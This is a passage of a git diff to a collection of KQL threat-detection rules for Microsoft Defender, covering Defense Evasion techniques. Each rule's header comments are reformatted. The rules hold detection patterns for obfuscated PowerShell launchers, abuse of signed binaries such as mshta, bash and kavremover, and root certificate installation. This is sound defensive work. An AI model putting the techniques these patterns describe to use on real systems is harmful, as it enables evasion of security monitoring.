opposed to commonly seen artifacts +// - Legit usage of scripts + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql index d9e28c68..2a87d7a5 100644 --- a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql +++ b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql @@ -1,11 +1,11 @@ -// Title: Indirect Command Execution From Script File Via Bash.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-15 -// Level: medium -// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. -// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Indirect Command Execution From Script File Via Bash.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-15 +// Level: medium +// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. +// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql index 3b7107b1..6863b7f2 100644 --- a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql +++ b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql @@ -1,11 +1,11 @@ -// Title: Indirect Inline Command Execution Via Bash.EXE -// Author: frack113 -// Date: 2021-11-24 -// Level: medium -// Description: Detects execution of Microsoft bash launcher with the "-c" flag. -// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Indirect Inline Command Execution Via Bash.EXE +// Author: frack113 +// Date: 2021-11-24 +// Level: medium +// Description: Detects execution of Microsoft bash launcher with the "-c" flag. +// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql index 5f43d093..7d8c5ca7 100644 --- a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql +++ b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql @@ -1,10 +1,10 @@ -// Title: InfDefaultInstall.exe .inf Execution -// Author: frack113 -// Date: 2021-07-13 -// Level: medium -// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: InfDefaultInstall.exe .inf Execution +// Author: frack113 +// Date: 2021-07-13 +// Level: medium +// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql index ca915d68..ec6ce9a9 100644 --- a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql +++ b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql @@ -1,12 +1,12 @@ -// Title: Insensitive Subfolder Search Via Findstr.EXE -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-05 -// Level: low -// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 -// False Positives: -// - Administrative or software activity - -DeviceProcessEvents +// Title: Insensitive Subfolder Search Via Findstr.EXE +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: low +// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 +// False Positives: +// - Administrative or software activity + +DeviceProcessEvents | where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i " or ProcessCommandLine contains " –i " or ProcessCommandLine contains " —i " or ProcessCommandLine contains " ―i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s " or ProcessCommandLine contains " –s " or ProcessCommandLine contains " —s " or ProcessCommandLine contains " ―s ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql index 18553f29..0d6d9293 100644 --- a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql +++ b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql @@ -1,14 +1,14 @@ -// Title: Install New Package Via Winget Local Manifest -// Author: Sreeman, Florian Roth (Nextron Systems), frack113 -// Date: 2020-04-21 -// Level: medium -// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. -// The manifest option enables you to install an application by passing in a YAML file directly to the client. -// Winget can be used to download and install exe, msi or msix files later. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059 -// False Positives: -// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications - -DeviceProcessEvents +// Title: Install New Package Via Winget Local Manifest +// Author: Sreeman, Florian Roth (Nextron Systems), frack113 +// Date: 2020-04-21 +// Level: medium +// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. +// The manifest option enables you to install an application by passing in a YAML file directly to the client. +// Winget can be used to download and install exe, msi or msix files later. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications + +DeviceProcessEvents | where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/install_root_certificate.kql b/KQL/rules/Defense Evasion/install_root_certificate.kql index e8e7381b..353acf5a 100644 --- a/KQL/rules/Defense Evasion/install_root_certificate.kql +++ b/KQL/rules/Defense Evasion/install_root_certificate.kql @@ -1,12 +1,12 @@ -// Title: Install Root Certificate -// Author: Ömer Günal, oscd.community -// Date: 2020-10-05 -// Level: low -// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Install Root Certificate +// Author: Ömer Günal, oscd.community +// Date: 2020-10-05 +// Level: low +// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/update-ca-certificates" or FolderPath endswith "/update-ca-trust" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql index 87951736..c7a3d5df 100644 --- a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql +++ b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql @@ -1,12 +1,12 @@ -// Title: Internet Explorer DisableFirstRunCustomize Enabled -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-16 -// Level: medium -// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - As this is controlled by group policy as well as user settings. Some false positives may occur. - -DeviceRegistryEvents +// Title: Internet Explorer DisableFirstRunCustomize Enabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: medium +// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - As this is controlled by group policy as well as user settings. Some false positives may occur. + +DeviceRegistryEvents | where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) and (not(((RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath contains "\\Temp\\" and InitiatingProcessFolderPath contains "\\.cr\\avira_")) or (RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe", "C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe")))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql index e80d4f9a..d4bf3bbf 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation CLIP+ Launcher -// Author: Jonathan Cheong, oscd.community -// Date: 2020-10-13 -// Level: high -// Description: Detects Obfuscated use of Clip.exe to execute PowerShell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation CLIP+ Launcher +// Author: Jonathan Cheong, oscd.community +// Date: 2020-10-13 +// Level: high +// Description: Detects Obfuscated use of Clip.exe to execute PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql index d1ec21ab..1ecf0bba 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation COMPRESS OBFUSCATION -// Author: Timur Zinniatullin, oscd.community -// Date: 2020-10-18 -// Level: medium -// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation COMPRESS OBFUSCATION +// Author: Timur Zinniatullin, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql index df6c48fa..d5e8ee7d 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation Obfuscated IEX Invocation -// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community -// Date: 2019-11-08 -// Level: high -// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation Obfuscated IEX Invocation +// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +// Date: 2019-11-08 +// Level: high +// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql index dfb4d941..f757d6cc 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation STDIN+ Launcher -// Author: Jonathan Cheong, oscd.community -// Date: 2020-10-15 -// Level: high -// Description: Detects Obfuscated use of stdin to execute PowerShell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation STDIN+ Launcher +// Author: Jonathan Cheong, oscd.community +// Date: 2020-10-15 +// Level: high +// Description: Detects Obfuscated use of stdin to execute PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\"" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql index 43b33d4b..21843273 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation VAR+ Launcher -// Author: Jonathan Cheong, oscd.community -// Date: 2020-10-15 -// Level: high -// Description: Detects Obfuscated use of Environment Variables to execute PowerShell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation VAR+ Launcher +// Author: Jonathan Cheong, oscd.community +// Date: 2020-10-15 +// Level: high +// Description: Detects Obfuscated use of Environment Variables to execute PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\"" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql index 873f59b9..2a825bce 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION -// Author: Timur Zinniatullin, oscd.community -// Date: 2020-10-13 -// Level: high -// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +// Author: Timur Zinniatullin, oscd.community +// Date: 2020-10-13 +// Level: high +// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql index df58ebd7..f7ba515b 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation Via Stdin -// Author: Nikita Nazarov, oscd.community -// Date: 2020-10-12 -// Level: high -// Description: Detects Obfuscated Powershell via Stdin in Scripts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation Via Stdin +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects Obfuscated Powershell via Stdin in Scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*"" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql index 53a7e851..c7f60be2 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation Via Use Clip -// Author: Nikita Nazarov, oscd.community -// Date: 2020-10-09 -// Level: high -// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation Via Use Clip +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-09 +// Level: high +// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql index 320b20d7..230a5c07 100644 --- a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql @@ -1,10 +1,10 @@ -// Title: Invoke-Obfuscation Via Use MSHTA -// Author: Nikita Nazarov, oscd.community -// Date: 2020-10-08 -// Level: high -// Description: Detects Obfuscated Powershell via use MSHTA in Scripts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Invoke-Obfuscation Via Use MSHTA +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-08 +// Level: high +// Description: Detects Obfuscated Powershell via use MSHTA in Scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql index b490c7ef..a8c1cf13 100644 --- a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql +++ b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql @@ -1,13 +1,13 @@ -// Title: JScript Compiler Execution -// Author: frack113 -// Date: 2022-05-02 -// Level: low -// Description: Detects the execution of the "jsc.exe" (JScript Compiler). -// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 -// False Positives: -// - Legitimate use to compile JScript by developers. - -DeviceProcessEvents +// Title: JScript Compiler Execution +// Author: frack113 +// Date: 2022-05-02 +// Level: low +// Description: Detects the execution of the "jsc.exe" (JScript Compiler). +// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use to compile JScript by developers. + +DeviceProcessEvents | where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql index cd771809..90e5378a 100644 --- a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql +++ b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql @@ -1,10 +1,10 @@ -// Title: Kavremover Dropped Binary LOLBIN Usage -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-11-01 -// Level: high -// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: Kavremover Dropped Binary LOLBIN Usage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-01 +// Level: high +// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\cleanapi.exe" or InitiatingProcessFolderPath endswith "\\kavremover.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql index 4c4ad593..60eb710d 100644 --- a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql +++ b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql @@ -1,12 +1,12 @@ -// Title: Kernel Memory Dump Via LiveKD -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-16 -// Level: high -// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely in production environment - -DeviceProcessEvents +// Title: Kernel Memory Dump Via LiveKD +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: high +// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely in production environment + +DeviceProcessEvents | where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m" or ProcessCommandLine contains " –m" or ProcessCommandLine contains " —m" or ProcessCommandLine contains " ―m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql index 1be53fa6..09cd1468 100644 --- a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql +++ b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql @@ -1,12 +1,12 @@ -// Title: Launch-VsDevShell.PS1 Proxy Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216.001 -// False Positives: -// - Legitimate usage of the script by a developer - -DeviceProcessEvents +// Title: Launch-VsDevShell.PS1 Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216.001 +// False Positives: +// - Legitimate usage of the script by a developer + +DeviceProcessEvents | where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql index 0b5b55cf..5f722cba 100644 --- a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql +++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql @@ -1,10 +1,10 @@ -// Title: Legitimate Application Dropped Archive -// Author: frack113, Florian Roth -// Date: 2022-08-21 -// Level: high -// Description: Detects programs on a Windows system that should not write an archive to disk -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceFileEvents +// Title: Legitimate Application Dropped Archive +// Author: frack113, Florian Roth +// Date: 2022-08-21 +// Level: high +// Description: Detects programs on a Windows system that should not write an archive to disk +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath 